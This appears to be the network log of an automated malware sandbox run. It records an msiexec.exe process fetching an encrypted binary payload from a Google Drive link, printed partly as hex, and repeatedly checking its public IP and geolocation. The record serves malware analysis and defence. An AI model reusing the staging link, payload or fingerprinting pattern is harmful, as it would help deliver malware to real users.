                                                                  Jan 10, 2025 16:02:44.055475950 CET1.1.1.1192.168.2.90x728bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 16:02:44.055475950 CET1.1.1.1192.168.2.90x728bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 16:02:45.690382004 CET1.1.1.1192.168.2.90xa9b6No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 16:02:45.690382004 CET1.1.1.1192.168.2.90xa9b6No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 16:02:45.690382004 CET1.1.1.1192.168.2.90xa9b6No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 16:02:45.690382004 CET1.1.1.1192.168.2.90xa9b6No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 16:02:45.690382004 CET1.1.1.1192.168.2.90xa9b6No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 16:02:45.690382004 CET1.1.1.1192.168.2.90xa9b6No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 16:02:45.690382004 CET1.1.1.1192.168.2.90xa9b6No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                  • drive.google.com
                                                                  • drive.usercontent.google.com
                                                                  • reallyfreegeoip.org
                                                                  • checkip.dyndns.org
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.949897193.122.6.168805400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 16:02:44.064332008 CET151OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Connection: Keep-Alive
                                                                  Jan 10, 2025 16:02:44.713593960 CET273INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:44 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                  Jan 10, 2025 16:02:44.716928005 CET127OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Jan 10, 2025 16:02:44.911041975 CET273INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:44 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                  Jan 10, 2025 16:02:46.331145048 CET127OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Jan 10, 2025 16:02:46.539545059 CET273INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:46 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.949921193.122.6.168805400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 16:02:47.177603006 CET127OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Jan 10, 2025 16:02:47.813488007 CET273INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:47 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.949927193.122.6.168805400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 16:02:48.416366100 CET151OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Connection: Keep-Alive
                                                                  Jan 10, 2025 16:02:49.053034067 CET273INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:48 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.949939193.122.6.168805400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 16:02:49.700997114 CET151OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Connection: Keep-Alive
                                                                  Jan 10, 2025 16:02:50.338061094 CET273INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:50 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.949947193.122.6.168805400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 16:02:51.132606983 CET151OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Connection: Keep-Alive
                                                                  Jan 10, 2025 16:02:51.790949106 CET273INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:51 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.949958193.122.6.168805400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 16:02:52.403361082 CET151OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Connection: Keep-Alive
                                                                  Jan 10, 2025 16:02:53.047909021 CET273INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:52 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.949970193.122.6.168805400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 16:02:53.667634010 CET151OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Connection: Keep-Alive
                                                                  Jan 10, 2025 16:02:54.297077894 CET273INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:54 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.949861172.217.16.2064435400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 15:02:39 UTC216OUTGET /uc?export=download&id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  2025-01-10 15:02:40 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 15:02:40 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-f1ZW-mXgKuu6TyKwPHChAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.949871142.250.181.2254435400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 15:02:40 UTC258OUTGET /download?id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  2025-01-10 15:02:43 UTC4941INHTTP/1.1 200 OK
                                                                  X-GUploader-UploadID: AFIdbgQEu9w2dh3U17VU3Msi1yYqJCuO80vsDyU4T8FUcVK1sA3I-4IMYIICADLS2AWqJGP4
                                                                  Content-Type: application/octet-stream
                                                                  Content-Security-Policy: sandbox
                                                                  Content-Security-Policy: default-src 'none'
                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                  X-Content-Security-Policy: sandbox
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                  Cross-Origin-Resource-Policy: same-site
                                                                  X-Content-Type-Options: nosniff
                                                                  Content-Disposition: attachment; filename="NmDjHJYUcmpluvDtn149.bin"
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Credentials: false
                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 133696
                                                                  Last-Modified: Mon, 07 Oct 2024 14:32:58 GMT
                                                                  Date: Fri, 10 Jan 2025 15:02:43 GMT
                                                                  Expires: Fri, 10 Jan 2025 15:02:43 GMT
                                                                  Cache-Control: private, max-age=0
                                                                  X-Goog-Hash: crc32c=/EQpnQ==
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2025-01-10 15:02:43 UTC4941INData Raw: 9f ec 48 ca d6 05 8a c8 83 33 60 bc 95 19 e9 67 a1 26 7f 7e 2c 1a d6 a7 a8 75 dc f8 d4 6c 8b a5 93 4d c6 fe 2f 3b 77 b3 a3 f2 e6 aa 6c 20 5f 5a e9 7b 0c 35 42 d5 09 19 c1 c0 3a b7 96 72 d2 61 d8 53 45 1e d0 e1 d5 74 93 92 18 0f 2c e3 08 90 d8 04 b4 c1 69 50 1f c4 29 85 8c 38 65 fe 7c 6e ce f3 b5 2d 05 f1 f3 13 b9 f4 10 2a 7e f2 1d 44 a1 87 56 6e 04 ca 2a 32 3e 88 d9 37 9f 4f 8a 3c 53 62 a8 93 13 b8 50 68 4b 91 7c 7c 0e 38 e3 c6 b0 50 bc c7 9c b3 5a 8b 96 d0 f2 f4 93 9e d3 c8 7e 37 01 ee 28 a0 fb 52 b0 1b 5a 18 1f bf d1 04 e1 f8 f0 14 54 b3 03 2a 0c 47 d7 a7 cd aa 14 c5 02 42 79 3b dc f6 00 fc 4d b9 be 84 c7 9b a4 96 ea 6b 3d d6 67 e7 0e ab 4f 8f bf c0 5f 88 51 f3 c4 0c 40 64 39 72 cf c9 b1 bb c1 df 4c 8f 7f e1 2b 5c 17 c9 53 b1 c8 2d 1b b0 6c 11 96 11 e8
                                                                  Data Ascii: H3`g&~,ulM/;wl _Z{5B:raSEt,iP)8e|n-*~DVn*2>7O<SbPhK||8PZ~7(RZT*GBy;Mk=gO_Q@d9rL+\S-l
                                                                  2025-01-10 15:02:43 UTC4816INData Raw: 94 06 34 cd 83 c4 fa d0 d0 e5 9e aa 3f 06 29 12 cd aa 8a 27 8a 82 ea 16 ab b1 d8 d0 de a2 aa f9 aa a4 05 7d 4e e9 d1 ca b8 b1 de e0 51 52 09 5e a7 f6 df eb 3a 47 ff c4 32 27 c0 e8 9f 62 05 d2 d3 5e 3f 7e 41 7b 9a d9 f9 ba 37 7e 19 17 44 27 32 02 ca a6 21 eb a7 28 2e ce 98 96 90 66 54 ea 84 c5 ff fd 0d 7e f5 1c 8c f4 9a d0 15 7a c5 a9 10 52 3b c0 68 db 8b 20 03 28 45 ef 39 6e 99 f4 fb aa a0 5f 34 39 23 9f c7 08 e4 2a f1 11 67 b2 0d a5 0e 01 c1 98 03 bf aa 4f bf 4f b0 af e6 e6 32 74 a4 90 81 04 26 70 3f 18 9b 95 b3 b0 1a 3d 3b 34 56 af 8b 9f 30 90 a4 33 50 25 11 16 e1 bb 37 e5 1e 74 75 0e 9f 67 c6 1b 3e a8 1c 46 7f c8 44 10 40 c2 38 64 19 2e 4b 56 f8 ce 40 d0 3e f7 78 6a d6 34 c8 56 d1 08 31 c3 48 aa 00 7f 28 88 96 97 f6 03 86 a7 b6 09 d8 2c d4 ac 56 d5 ea
                                                                  Data Ascii: 4?)'}NQR^:G2'b^?~A{7~D'2!(.fT~zR;h (E9n_49#*gOO2t&p?=;4V03P%7tug>FD@8d.KV@>xj4V1H(,V
                                                                  2025-01-10 15:02:43 UTC1390INData Raw: e8 14 79 d3 ec c1 03 60 03 e3 99 aa 5a ab 23 f7 3f b7 88 c7 f4 25 5f 96 fc fc 4b 75 fb 58 9a a4 d0 8b 35 19 03 c0 21 cc 1c e4 a2 86 56 44 c2 ef 86 ea e6 55 8d f8 a8 06 f8 f7 af f5 33 3d a6 6b 93 97 a3 23 f6 df 4c 8a 8e 2f b6 ac 7a da 34 ad 58 dc e9 33 2f b5 07 e6 1c 80 15 4b 94 82 73 a1 99 6b 18 7f 68 ee e6 91 fa 58 8b a9 cf c0 54 ae bb 92 a4 83 b9 ba d9 18 80 79 58 b6 ce 54 1d dd 05 15 5a e0 e1 e1 9c 74 87 05 bc c0 d0 b3 5f a3 23 66 51 90 fd 2f 1e d0 85 a2 f6 12 51 b5 ab 4d 00 64 f3 2a ef 49 05 b0 71 d8 7f a3 9f 01 2a c0 2c a1 55 6a 71 87 21 2d 2b 43 b0 db 0b 84 fd 40 d6 18 dd 50 7c 66 d0 27 2a 79 e7 74 f1 57 6f b7 9c 47 61 30 eb 71 a5 2a 4a a0 7e a1 4f aa 3c 71 3b 4e a7 3e d5 15 74 ea 17 7c ac b3 9a be 3f 89 0d 09 c2 1e d3 e1 d5 74 97 93 18 bc 67 1c 15
                                                                  Data Ascii: y`Z#?%_KuX5!VDU3=k#L/z4X3/KskhXTyXTZt_#fQ/QMd*Iq*,Ujq!-+C@P|f'*ytWoGa0q*J~O<q;N>t|?tg
                                                                  2025-01-10 15:02:43 UTC1390INData Raw: 14 bb 99 38 c9 1f 33 d3 ee e0 9a 08 05 2b 6d 1f 6a dd 23 15 7e f5 fc 33 3d 1b 83 ca 94 97 14 64 9c ec d0 0b 6a 3b 86 55 79 5a a1 23 c6 37 d8 54 c7 f4 5c f6 48 ec d3 68 33 77 4d 90 c7 f3 c1 1d 4a 05 e8 60 12 1c ee ae 81 3c 2d 0c fa 82 e8 15 cf 8e 88 be 2f 8b e1 a7 5d 00 d0 a2 6c 8b 91 22 9a ae de 4d af 98 2c d4 8f 58 dc 23 83 81 62 e9 39 03 8c be f0 8d a7 17 13 5e 93 76 bd 10 4e 32 72 16 c2 ea 96 8c 4d 5c a9 bf a5 90 6c bb 98 a3 f1 9b b6 b6 ab 93 7d 5b a7 4b 54 1d d3 79 d6 71 f8 fa e6 e2 d4 f5 a9 a1 b4 df 9b ee a2 30 64 32 5a 85 81 6e f8 ea b1 f2 18 2f 77 c4 e2 0a 64 e8 34 fd d5 4c 9d aa 07 4d a4 ea f0 29 c0 5c 02 5c 70 48 31 54 38 21 e1 94 ac 78 1a eb 4a a6 66 e9 4d 08 9d cd 02 06 ef c2 6e 89 4e 7d b7 9e 15 5c 4b 9b 59 1f 45 8c aa 7e bf 45 aa 3c 71 3b 42
                                                                  Data Ascii: 83+mj#~3=dj;UyZ#7T\Hh3wMJ`<-/]l"M,X#b9^vN2rM\l}[KTyq0d2Zn/wd4LM)\\pH1T8!xJfMnN}\KYE~E<q;B
                                                                  2025-01-10 15:02:43 UTC1390INData Raw: 4a bb 75 c2 72 6c df 98 06 f9 53 e2 50 de 60 26 d5 92 63 0d f9 6b 3a 22 5f 7e 24 f4 bc 3c 72 b5 38 c3 70 6d d2 ee ea 5a 18 0c 55 5b 1f 6a d9 18 32 7e f4 e3 70 8d 1b c2 c3 fb 5c 30 64 96 fd c1 7c 62 33 e9 9d 0b 0e bc 23 a7 29 9f cf c7 f4 5c e0 68 fd fc 46 3e af 4d 9a d4 ec 11 5c 19 05 e9 42 e1 1c ee a4 f3 26 21 0c 8a 91 17 f2 d8 8e f9 8d 11 a3 cc a7 57 12 06 a7 7f 87 86 41 15 f6 df 47 dd 10 21 2a f9 41 b9 23 85 f8 a2 d8 39 09 a0 29 ba 8d ad 1d 12 a2 8a 76 c7 2b 09 23 7f 62 46 fe 82 9c 16 2a a9 bf a5 8b 2a bb 98 a8 fa 8a bc ab ca 84 7d 21 b6 da 54 1d dd 16 15 0f d3 f0 e6 f7 a7 ab 05 b6 b0 dc 0a 5f a2 3a 01 fa 98 92 8b 1e ae bf b1 f2 16 68 50 c4 e2 0a 68 fe 31 68 31 66 f2 11 06 68 b8 98 74 38 af 90 a0 79 6d 6d 89 5c 2e 23 cd d8 db b7 84 fd 40 d6 cd a3 34 76
                                                                  Data Ascii: JurlSP`&ck:"_~$<r8pmZU[j2~p\0d|b3#)\hF>M\B&!WAG!*A#9)v+#bF**}!T_:hPh1h1fht8ymm\.#@4v
                                                                  2025-01-10 15:02:43 UTC1390INData Raw: d2 7f 2f d6 0d c2 de 92 35 e6 ab 55 be 7f 0c 25 26 4a cc b6 0d d2 14 98 60 58 ed 55 35 4a 65 61 cf 5e 58 df 9e 63 5c 58 e2 72 ff f8 3c df 3c 4b 68 d3 6b 30 1d 72 7e 24 f0 94 76 72 99 32 bd 7e f9 d3 ea c2 d0 19 0c 5f e9 0b 7e cd 75 85 7e f5 f2 34 00 1b 83 c1 f7 5c 1c 16 34 fb c1 72 14 8b e9 99 73 5a a3 5d fc 3f b7 9d b9 d8 56 f6 92 8f 4f 40 07 7d 22 20 d4 f8 cb 35 31 87 e8 6a c6 01 63 ee 81 42 37 29 ec f4 80 eb d8 fe 5a 8d 10 f5 50 a7 57 1c 8c 86 67 f5 1e 38 a3 86 7d 68 b6 e6 1d 2a 89 6d 7e 06 9f 80 68 ff 39 79 06 24 eb f3 8d 17 60 9a fc 90 b7 03 49 81 5a 74 96 cc 8c 88 4e 3f 81 c4 af ff a4 d4 e0 a9 f1 80 b6 d1 61 1d 14 3b b6 d9 54 1d dd 16 12 79 97 4c e6 f3 d3 94 01 a7 b0 a6 a5 56 2c 59 01 fd 98 92 8b 1e c1 8b de 92 12 40 b8 c4 90 33 65 f9 49 66 54 0c 9d
                                                                  Data Ascii: /5U%&J`XU5Jea^Xc\Xr<<Khk0r~$vr2~_~u~4\4rsZ]?VO@}" 51jcB7)ZPWg8}h*m~h9y$`IZtN?a;TyLV,Y@3eIfT
